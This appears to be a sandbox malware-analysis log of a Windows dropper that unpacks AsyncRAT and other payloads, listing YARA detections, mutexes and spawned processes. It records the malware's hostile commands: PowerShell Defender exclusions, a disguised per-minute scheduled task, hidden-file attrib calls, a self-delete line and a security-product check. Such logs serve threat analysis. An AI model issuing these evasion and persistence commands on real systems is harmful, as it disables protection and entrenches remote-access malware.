Source: 22b0b7688f.exe.9.dr	Static PE information: section name: .idata
Source: 22b0b7688f.exe.9.dr	Static PE information: section name:
Source: random[1].exe0.9.dr	Static PE information: section name:
Source: random[1].exe0.9.dr	Static PE information: section name: .idata
Source: random[1].exe0.9.dr	Static PE information: section name:
Source: 950932ab59.exe.9.dr	Static PE information: section name:
Source: 950932ab59.exe.9.dr	Static PE information: section name: .idata
Source: 950932ab59.exe.9.dr	Static PE information: section name:
Source: random[3].exe.9.dr	Static PE information: section name:
Source: random[3].exe.9.dr	Static PE information: section name: .idata
Source: random[3].exe.9.dr	Static PE information: section name:
Source: b93717638f.exe.9.dr	Static PE information: section name:
Source: b93717638f.exe.9.dr	Static PE information: section name: .idata
Source: b93717638f.exe.9.dr	Static PE information: section name:
Source: random[2].exe2.9.dr	Static PE information: section name:
Source: random[2].exe2.9.dr	Static PE information: section name: .idata
Source: random[2].exe2.9.dr	Static PE information: section name:
Source: 92133eb3c2.exe.9.dr	Static PE information: section name:
Source: 92133eb3c2.exe.9.dr	Static PE information: section name: .idata
Source: 92133eb3c2.exe.9.dr	Static PE information: section name:
Source: random[3].exe0.9.dr	Static PE information: section name:
Source: random[3].exe0.9.dr	Static PE information: section name: .idata
Source: random[3].exe0.9.dr	Static PE information: section name:
Source: 224de4e34e.exe.9.dr	Static PE information: section name:
Source: 224de4e34e.exe.9.dr	Static PE information: section name: .idata
Source: 224de4e34e.exe.9.dr	Static PE information: section name:
Source: random[4].exe.9.dr	Static PE information: section name:
Source: random[4].exe.9.dr	Static PE information: section name: .idata
Source: 22b355416f.exe.9.dr	Static PE information: section name:
Source: 22b355416f.exe.9.dr	Static PE information: section name: .idata
Source: random[3].exe1.9.dr	Static PE information: section name:
Source: random[3].exe1.9.dr	Static PE information: section name: .idata
Source: 2002c77d6d.exe.9.dr	Static PE information: section name:
Source: 2002c77d6d.exe.9.dr	Static PE information: section name: .idata

Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\Tasks\skotes.job	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	File created: C:\Windows\MpForgotten
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	File created: C:\Windows\TabletAction
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	File created: C:\Windows\CommunityProduction
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	File created: C:\Windows\ExtractNicholas

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00EB78BB	1_2_00EB78BB
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00EB8860	1_2_00EB8860
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00EB7049	1_2_00EB7049
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00EB31A8	1_2_00EB31A8
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E74B30	1_2_00E74B30
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E74DE0	1_2_00E74DE0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00EB2D10	1_2_00EB2D10
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00EB779B	1_2_00EB779B
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00EA7F36	1_2_00EA7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_004B7049	2_2_004B7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_004B8860	2_2_004B8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_004B78BB	2_2_004B78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_004B31A8	2_2_004B31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00474B30	2_2_00474B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_004B2D10	2_2_004B2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00474DE0	2_2_00474DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_004A7F36	2_2_004A7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_004B779B	2_2_004B779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_0047E530	9_2_0047E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_00496192	9_2_00496192
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_004B8860	9_2_004B8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_00474B30	9_2_00474B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_004B2D10	9_2_004B2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_00474DE0	9_2_00474DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_00490E13	9_2_00490E13
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_004B7049	9_2_004B7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_004B31A8	9_2_004B31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_00491602	9_2_00491602
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_004B779B	9_2_004B779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_004B78BB	9_2_004B78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_00493DF1	9_2_00493DF1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 9_2_004A7F36	9_2_004A7F36

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Process token adjusted: Security

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0048DF80 appears 64 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 004A8E10 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0048D64E appears 66 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0048D942 appears 85 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0048D663 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 004880C0 appears 263 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00487A00 appears 38 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00E880C0 appears 130 times

Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5208 -s 784

Source: 003.exe.9.dr	Static PE information: No import functions for PE file found
Source: 003[1].exe.9.dr	Static PE information: No import functions for PE file found

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 11.2.RzAAR0y.exe.1ac390b0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.RzAAR0y.exe.1ac390b0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 14.2.vQeyqr1.exe.1e610000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 14.2.vQeyqr1.exe.1e730000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 14.0.vQeyqr1.exe.ca0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 14.2.vQeyqr1.exe.1470000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 14.2.vQeyqr1.exe.1470000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 14.2.vQeyqr1.exe.1e730000.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 14.2.vQeyqr1.exe.1e610000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0000000B.00000002.4672951353.000001AC390B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000E.00000002.4777458351.000000001E610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0000000E.00000002.4646618680.0000000001470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 0000000E.00000002.4778915150.000000001E730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000E.00000000.2971558545.0000000000CA2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000002.4639753741.000001AC373B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: random[4].exe0.9.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9977967472752044
Source: skotes.exe.1.dr	Static PE information: Section: ZLIB complexity 0.9977967472752044
Source: random[1].exe.9.dr	Static PE information: Section: hkbprtow ZLIB complexity 0.9944030100185397
Source: 22b0b7688f.exe.9.dr	Static PE information: Section: hkbprtow ZLIB complexity 0.9944030100185397
Source: random[1].exe0.9.dr	Static PE information: Section: ZLIB complexity 0.9973445526541096
Source: random[1].exe0.9.dr	Static PE information: Section: lzigcvvj ZLIB complexity 0.9945462015898131
Source: 950932ab59.exe.9.dr	Static PE information: Section: ZLIB complexity 0.9973445526541096
Source: 950932ab59.exe.9.dr	Static PE information: Section: lzigcvvj ZLIB complexity 0.9945462015898131
Source: random[2].exe0.9.dr	Static PE information: Section: .bss ZLIB complexity 1.0003343485169491
Source: random[2].exe0.9.dr	Static PE information: Section: .bss ZLIB complexity 1.0003343485169491
Source: ca733a156b.exe.9.dr	Static PE information: Section: .bss ZLIB complexity 1.0003343485169491
Source: ca733a156b.exe.9.dr	Static PE information: Section: .bss ZLIB complexity 1.0003343485169491
Source: random[3].exe.9.dr	Static PE information: Section: lvbdatvl ZLIB complexity 0.9941535782511534
Source: b93717638f.exe.9.dr	Static PE information: Section: lvbdatvl ZLIB complexity 0.9941535782511534
Source: random[2].exe2.9.dr	Static PE information: Section: gptxkuce ZLIB complexity 0.9902796749553969
Source: 92133eb3c2.exe.9.dr	Static PE information: Section: gptxkuce ZLIB complexity 0.9902796749553969
Source: random[3].exe0.9.dr	Static PE information: Section: ZLIB complexity 0.997384685359589
Source: random[3].exe0.9.dr	Static PE information: Section: gghkcrho ZLIB complexity 0.9945929092969679
Source: 224de4e34e.exe.9.dr	Static PE information: Section: ZLIB complexity 0.997384685359589
Source: 224de4e34e.exe.9.dr	Static PE information: Section: gghkcrho ZLIB complexity 0.9945929092969679

Source: file.exe	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: skotes.exe.1.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: 08b7ae794c.exe.9.dr, Program.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 08b7ae794c.exe.9.dr, Program.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: random[2].exe1.9.dr, Program.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: random[2].exe1.9.dr, Program.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@96/105@0/14

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\2gwmtZs[1].exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3512:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe	Mutant created: \Sessions\1\BaseNamedObjects\KHXAIlccOnv2cQo9
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Mutant created: \Sessions\1\BaseNamedObjects\dpmm9KHGR0UIHU3V
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4396:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5208
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6476:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:612:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4600:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4208:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:340:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6052:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"

Source: C:\Windows\SysWOW64\tasklist.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: file.exe

ReversingLabs: Detection: 52%

Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 2gwmtZs.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe "C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe "C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe "C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe "C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe"
Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 65,10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe "C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe"
Source: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move App App.cmd & App.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe "C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
Source: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5208 -s 784
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Windows\System32\attrib.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
Source: C:\Windows\System32\attrib.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'vQeyqr1.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe "C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe "C:\Users\user\AppData\Local\Temp\1018875001\2gwmtZs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe "C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe "C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe "C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe "C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe "C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe "C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018896001\28d287a54d.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe'
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'vQeyqr1.exe'
Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe	Process created: unknown unknown
